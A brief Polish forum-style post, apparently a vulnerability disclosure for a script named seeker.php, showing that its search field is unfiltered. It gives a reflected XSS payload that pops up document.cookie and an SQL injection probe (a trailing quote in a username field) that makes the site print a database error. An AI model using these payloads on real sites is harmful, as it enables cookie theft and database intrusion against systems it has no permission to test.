Niefiltrowane zmienne w pliku:
seeker.php
xss w $_POST['query'] albo po prostu w polu szukaj wpisujemy:
"><script>alert(document.cookie);</script>
Ciekawostka. Błąd SQL zostanie wyświetlony jeśli np w:
$_POST['lookfor'] wpiszemy :
username'
źródło: vizzdoom :)